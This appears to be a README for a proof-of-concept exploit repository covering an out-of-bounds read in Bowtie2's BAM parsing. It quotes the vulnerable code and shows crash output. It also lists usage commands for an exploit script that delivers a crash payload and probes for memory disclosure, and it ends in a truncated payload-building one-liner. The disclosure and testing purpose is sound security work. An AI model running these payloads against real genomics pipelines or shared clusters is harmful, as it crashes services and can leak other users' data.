jabir-dev/CVE-2026-Bowtie2-OOB

# CVE-2026-XXXXX: Bowtie2 Out-of-Bounds Read via Crafted BAM ## Overview | Field | Value | |-------|-------| | **Product** | Bowtie2 | | **Vendor** | BenLangmead | | **Versions** | 0 through 2.5.4 (all versions) | | **Type** | Out-of-bounds Read (CWE-125) | | **CVSS 4.0** | 8.7 High | | **Impact** | Denial of Service / Information Disclosure | | **bio.tools** | https://bio.tools/bowtie2 | ## Vulnerability // pat.cpp:1376-1381 memcpy(&nref, &alignment_batch[0] + i, sizeof(nref)); i += sizeof(nref); for (uint32_t j = 0; j < nref; j++) { // nref from untrusted file! uint32_t l_name; memcpy(&l_name, &alignment_batch[0] + i, sizeof(l_name)); // OOB READ i = i + sizeof(l_name) + l_name + sizeof(uint32_t); // i grows unbounded } ## Crash Evidence $ bowtie2 -x ref_idx -b crafted.bam --no-head Segmentation fault (core dumped) $ echo $? 139 ## Impact - **Denial of Service**: Guaranteed crash via SIGSEGV - **Information Disclosure**: OOB read can leak adjacent heap memory - **Potential RCE**: In specific heap layouts, chaining with write primitive ## Attack Surfaces 1. **Bioinformatics pipelines** processing untrusted BAM files 2. **Shared HPC clusters** where users share BAM files 3. **Web-based genomics platforms** accepting BAM uploads 4. **Galaxy Project** workflows with BAM input ## Usage # Check if bowtie2 is vulnerable python3 exploit.py --bt2 ./bowtie2 --index ref_idx --mode check # Deliver crash payload python3 exploit.py --bt2 ./bowtie2 --index ref_idx --mode crash # Information disclosure analysis python3 exploit.py --bt2 ./bowtie2 --index ref_idx --mode info # Save crash BAM for manual testing python3 exploit.py --bt2 ./bowtie2 --index ref_idx --save-bam crash.bam ### Quick Manual Test python3 -c " import struct, zlib bam = b'BAM\x01' + struct.pack('